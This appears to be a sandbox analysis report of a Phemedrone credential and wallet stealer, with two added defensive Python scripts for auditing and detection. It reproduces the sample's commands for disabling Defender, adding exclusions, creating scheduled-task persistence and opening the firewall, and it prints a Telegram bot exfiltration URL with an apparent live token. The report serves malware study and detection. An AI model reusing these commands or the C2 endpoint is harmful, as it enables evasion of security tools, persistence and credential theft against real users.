Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-09-2024 08:34

General

  • Target

    c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe

  • Size

    768KB

  • MD5

    69c4993d6b9836514cacc5997e171af0

  • SHA1

    1140c1da02be1aee978bb942e2458b625c666884

  • SHA256

    c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2

  • SHA512

    bbab4efad27846b3032c22fca816cf8792ab9d8944aa38185a6a867ecbbefa39b0b10cab6e357f512413fb7bd7352d5a18a19f68eb946e039c3eda9db7721419

  • SSDEEP

    12288:/EkHbPv8rE9hHKCzt8wDvsgCB9HM1tUUEAWss9apo0:/lHUE98ct8iv2s0lHNe

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot7266067820:AAGt1Lxc4KCTQDsEE5jnHkzETADxNAfSwWU/sendDocument

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Using powershell.exe command.

  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
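
What the Defender-tampering signatures above leave behind on a host, as an added example that is not part of the sandbox report or of the malware: a Python audit of a Get-MpPreference snapshot that names each weakened setting, decodes the numeric codes the process tree below sets (ThreatDefaultAction 6 = Allow, MAPSReporting 0 = Disabled, SubmitSamplesConsent 2 = NeverSend) and emits the Set-MpPreference / Remove-MpPreference line that reverts it. The snapshot is constructed from the values this sample sets; the user-writable path pattern and the Quarantine / Advanced / SendSafeSamples restore values are this example's assumptions, not a Microsoft baseline.

```python
"""Audit a Get-MpPreference snapshot for the settings this sample weakens and
produce the commands that revert them.  Added example for this page, not
sandbox, Microsoft or malware code."""
import json
import re

DISABLE_SWITCHES = (
    "DisableRealtimeMonitoring", "DisableBehaviorMonitoring",
    "DisableBlockAtFirstSeen", "DisableIOAVProtection", "DisableScriptScanning",
)
THREAT_ACTIONS = (
    "LowThreatDefaultAction", "ModerateThreatDefaultAction",
    "HighThreatDefaultAction", "SevereThreatDefaultAction",
)
# Documented meanings of the numeric codes Get-MpPreference reports.
THREAT_ACTION_NAMES = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow",
                       8: "UserDefined", 9: "NoAction", 10: "Block"}
MAPS_NAMES = {0: "Disabled", 1: "Basic", 2: "Advanced"}
CONSENT_NAMES = {0: "AlwaysPrompt", 1: "SendSafeSamples", 2: "NeverSend",
                 3: "SendAllSamples"}
# Exclusions under these roots are the ones malware adds for itself (assumption).
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata|windows\\temp)\\")

# Constructed snapshot: what `Get-MpPreference | ConvertTo-Json` would show
# once every command in this report's process tree has succeeded.
SNAPSHOT_JSON = r"""{
  "DisableRealtimeMonitoring": true,
  "DisableBehaviorMonitoring": true,
  "DisableBlockAtFirstSeen": true,
  "DisableIOAVProtection": true,
  "DisableScriptScanning": true,
  "SubmitSamplesConsent": 2,
  "MAPSReporting": 0,
  "HighThreatDefaultAction": 6,
  "ModerateThreatDefaultAction": 6,
  "LowThreatDefaultAction": 6,
  "SevereThreatDefaultAction": 6,
  "ExclusionPath": [
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\dll.exe",
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\phem.exe",
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\wd.vbs"
  ]
}"""


def load_snapshot(text=SNAPSHOT_JSON):
    return json.loads(text)


def audit(prefs):
    """Return (setting, current value, reverting command) per weakened setting."""
    issues = []
    for name in DISABLE_SWITCHES:
        if prefs.get(name) is True:
            issues.append((name, True, f"Set-MpPreference -{name} $false"))
    if prefs.get("MAPSReporting") == 0:
        issues.append(("MAPSReporting", 0, "Set-MpPreference -MAPSReporting Advanced"))
    if prefs.get("SubmitSamplesConsent") == 2:
        issues.append(("SubmitSamplesConsent", 2,
                       "Set-MpPreference -SubmitSamplesConsent SendSafeSamples"))
    for name in THREAT_ACTIONS:
        value = prefs.get(name)
        if value in (6, 9):  # Allow / NoAction: detections are not acted on
            issues.append((name, value, f"Set-MpPreference -{name} Quarantine"))
    for path in prefs.get("ExclusionPath") or []:
        if USER_WRITABLE.match(path):
            issues.append(("ExclusionPath", path,
                           f"Remove-MpPreference -ExclusionPath '{path}'"))
    return issues


def describe(name, value):
    """Readable meaning of a value, so the report says Allow rather than 6."""
    table = (THREAT_ACTION_NAMES if name in THREAT_ACTIONS else
             MAPS_NAMES if name == "MAPSReporting" else
             CONSENT_NAMES if name == "SubmitSamplesConsent" else {})
    return table.get(value, str(value))


def remediation_script(prefs):
    """PowerShell text that reverts every finding, one cmdlet call per line."""
    return "\n".join(fix for _, _, fix in audit(prefs))


if __name__ == "__main__":
    prefs = load_snapshot()
    for name, value, fix in audit(prefs):
        print(f"{name:<28} {describe(name, value):<45} -> {fix}")
    print("\n# remediation\n" + remediation_script(prefs))
```

On a live host, feed it the output of `Get-MpPreference | ConvertTo-Json` instead of the constructed snapshot. Two caveats: the Defender PowerShell module ships with Windows 8 and later, so on the Windows 7 image used for this run these cmdlets are not present and the calls in the process tree would not have changed anything; and on a current build with Tamper Protection enabled the same Set-MpPreference calls are blocked, so confirm the behaviour there before treating the signature as a successful bypass.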

Processes

  • C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
    "C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
    • C:\Users\Admin\AppData\Local\Temp\dll.exe
      "C:\Users\Admin\AppData\Local\Temp\dll.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\system32\CMD.exe
        "CMD" netsh advfirewall firewall add rule name="I6KX"gGn"Kc.">" dir=in action=allow program="C:\Users\Admin\WindowsHealth.exe" enable=yes & exit
        3⤵
          PID:2732
        • C:\Windows\system32\cmd.exe
          "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2508
        • C:\Windows\system32\cmd.exe
          "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST & exit
          3⤵
            PID:2516
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2756
          • C:\Users\Admin\WindowsHealth.exe
            "C:\Users\Admin\WindowsHealth.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phem.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Users\Admin\AppData\Local\Temp\phem.exe
          "C:\Users\Admin\AppData\Local\Temp\phem.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2748
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2748 -s 700
            3⤵
              PID:1524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wd.vbs'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs" /elevate
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              • Suspicious use of WriteProcessMemory
              PID:1840
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2028
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2284
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1792
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1972
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1912
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2788
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2932
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2316
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2148
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1444
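
Detection logic over the command lines in the tree above, as an added example that is not part of the sandbox report: a handful of Python rules that flag the Defender exclusion and Set-MpPreference calls (T1562.001), the one-minute HIGHEST scheduled task launching a binary from the user profile (T1053.005), the inbound firewall allow rule for that same binary (T1562.004) and the -ExecutionPolicy Bypass launches (T1059.001). The sample command lines are copied from this report; the rule names, the five-minute frequency threshold and the user-writable path pattern are this example's own choices, not a vendor ruleset.

```python
"""Detection rules for the Defender-tampering and persistence command lines
shown in the process tree above.  Added example for this page; it is not
the sandbox's or the malware's code, and the rules are the author's own."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique id
    rule: str        # short rule name
    detail: str      # what matched


# Set-MpPreference switches the sample sets to $true (features it turns off).
DISABLE_FLAGS = {
    "disablerealtimemonitoring", "disablebehaviormonitoring",
    "disableblockatfirstseen", "disableioavprotection", "disablescriptscanning",
}
# Numeric settings and the value that weakens them; all are set by this sample.
WEAK_VALUES = {
    "mapsreporting": "0",             # cloud (MAPS) reporting off
    "submitsamplesconsent": "2",      # never send samples
    "highthreatdefaultaction": "6",   # 6 = Allow
    "moderatethreatdefaultaction": "6",
    "lowthreatdefaultaction": "6",
    "severethreatdefaultaction": "6",
}
# Locations a standard user can write to (assumption: extend for your estate).
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata|windows\\temp)\\")
# A quoted or bare path following a switch such as /tr or program=.
PATH_ARG = r'(?:"([^"]+)"|(\S+))'


def _path(m):
    return (m.group(1) or m.group(2)) if m else ""


def check_defender(cmd):
    out = []
    if re.search(r"(?i)add-mppreference\s+-exclusion(path|extension|process)", cmd):
        out.append(Finding("T1562.001", "defender_exclusion_added", cmd))
    m = re.search(r"(?i)set-mppreference\s+-(\w+)\s+(\$true|\d+)", cmd)
    if m:
        name, value = m.group(1).lower(), m.group(2).lower()
        if name in DISABLE_FLAGS and value == "$true":
            out.append(Finding("T1562.001", "defender_feature_disabled", name))
        elif WEAK_VALUES.get(name) == value:
            out.append(Finding("T1562.001", "defender_weak_setting", f"{name}={value}"))
    return out


def check_schtasks(cmd):
    if not re.search(r"(?i)\bschtasks(\.exe)?\b.*/create", cmd):
        return []
    out = []
    m = re.search(r"(?i)/sc\s+minute\s+/mo\s+(\d+)", cmd)
    if m and int(m.group(1)) <= 5:
        out.append(Finding("T1053.005", "schtask_high_frequency", f"every {m.group(1)} min"))
    action = _path(re.search(r"(?i)/tr\s+" + PATH_ARG, cmd))
    if USER_WRITABLE.match(action) and re.search(r"(?i)/rl\s+highest", cmd):
        out.append(Finding("T1053.005", "schtask_highest_from_user_path", action))
    return out


def check_firewall(cmd):
    prog = _path(re.search(
        r"(?i)netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow.*program=" + PATH_ARG, cmd))
    if USER_WRITABLE.match(prog):
        return [Finding("T1562.004", "firewall_allow_user_path", prog)]
    return []


def check_powershell(cmd):
    if "powershell" in cmd.lower() and re.search(r"(?i)-executionpolicy\s+bypass", cmd):
        return [Finding("T1059.001", "powershell_execution_policy_bypass", cmd)]
    return []


RULES = (check_defender, check_schtasks, check_firewall, check_powershell)


def scan(cmdlines):
    """Apply every rule to every command line; findings come back in order."""
    return [f for cmd in cmdlines for rule in RULES for f in rule(cmd)]


# Constructed from the process tree in this report (quoted image plus arguments).
SAMPLE_CMDLINES = [
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'""",
    r""""CMD" netsh advfirewall firewall add rule name="I6KX"gGn"Kc.">" dir=in action=allow program="C:\Users\Admin\WindowsHealth.exe" enable=yes & exit""",
    r""""cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST & exit""",
    r""""cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST & exit""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force""",
    r""""C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs" /elevate""",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.technique}  {f.rule:<36} {f.detail}")
```

Run as is it reports eight findings. The second schtasks line (every 30 minutes, action C:\Windows\Setup.exe) produces none, which is the point of keeping the rules narrow: a frequency-and-path rule alone misses a task whose binary was dropped into the Windows directory, so pair it with the file-write telemetry behind the "Drops file in Windows directory" signature rather than widening the regexes.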

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Temp\dll.exe
          Filesize

          494KB

          MD5

          8df36558e2243aebb32c2f000f6c3004

          SHA1

          cdadf26e175a7c5c2f0733e922b20a3ed9e40b7c

          SHA256

          6416b46a1ef1c7f430578d925ba79755c44587de14fe25f13e3d907c2adab47e

          SHA512

          cd458956d0a2d7e84682735f815ec9ee3522b23d959870b9b12f7b780fac5a881c350b1ec7e0edd14b0b89219877c5eda7bdd5e75c613478cad3ccf3a85fb42b

        • C:\Users\Admin\AppData\Local\Temp\phem.exe
          Filesize

          121KB

          MD5

          da35d4754d59730768427d275dadfa76

          SHA1

          2cc27a5fa85d0c5a8faa9874d6cb45b472dd1ac8

          SHA256

          cbf36379349e8bfe52ce74ee151322333161142acb9f7b9434e2acaa6217755f

          SHA512

          c031ffdaa7624b71039810cca9cc045ddd84e570bb44ad211d6f9b5cc12676b74ce515c326cdf1323ed586e60cdb29806d603b9c9d503f31130c84551285ed0e

        • C:\Users\Admin\AppData\Local\Temp\wd.vbs
          Filesize

          1KB

          MD5

          f95be7e4eb1d1c7114c8daccb3ad6c63

          SHA1

          e0605fc6729fdfce938f5dfc07e2bcf11df22301

          SHA256

          86b3c33e6b71fe3907bc8c21b8ce311ff375d215d0a4924eba3c5f32068fe6e1

          SHA512

          58998140cdeb52047f2dc762598a0c13535bdfa81145ac4e394d6f7bf3ff7e0766eb375da140a8d3a784c6460b4cdd22d09bcb135ea8fa4d06733700783acc84

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          385a15b28773f375b4d6721fe024de8a

          SHA1

          538750d8ee7505ce2e6b50a66b77fb1eadfa8fba

          SHA256

          cc698e39918c9f60e072ee8ebac1719790697ccb14df67640743cc69cfb0cff9

          SHA512

          ee1fd9e5381cddf20fede0424440fd8872ec23df09740c61b03fa732ff83b3044ed57fc85b766b99883591189b1970cac216048ea1e16837679434cc366a636f

        • C:\Windows\xdwd.dll
          Filesize

          136KB

          MD5

          16e5a492c9c6ae34c59683be9c51fa31

          SHA1

          97031b41f5c56f371c28ae0d62a2df7d585adaba

          SHA256

          35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

          SHA512

          20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • memory/1644-23-0x0000000002810000-0x0000000002818000-memory.dmp
          Filesize

          32KB

        • memory/1644-22-0x000000001B630000-0x000000001B912000-memory.dmp
          Filesize

          2.9MB

        • memory/2028-50-0x0000000001E10000-0x0000000001E18000-memory.dmp
          Filesize

          32KB

        • memory/2080-7-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
          Filesize

          2.9MB

        • memory/2080-8-0x0000000001E80000-0x0000000001E88000-memory.dmp
          Filesize

          32KB

        • memory/2080-6-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

        • memory/2112-16-0x000000013F910000-0x000000013F990000-memory.dmp
          Filesize

          512KB

        • memory/2288-43-0x000000001B6C0000-0x000000001B6D0000-memory.dmp
          Filesize

          64KB

        • memory/2288-0-0x000007FEF5CF3000-0x000007FEF5CF4000-memory.dmp
          Filesize

          4KB

        • memory/2288-1-0x00000000012A0000-0x0000000001364000-memory.dmp
          Filesize

          784KB

        • memory/2568-150-0x000000013F480000-0x000000013F500000-memory.dmp
          Filesize

          512KB

        • memory/2568-154-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp
          Filesize

          136KB

        • memory/2568-152-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp
          Filesize

          136KB

        • memory/2748-30-0x0000000000FD0000-0x0000000000FF4000-memory.dmp
          Filesize

          144KB

        • memory/2864-36-0x0000000002870000-0x0000000002878000-memory.dmp
          Filesize

          32KB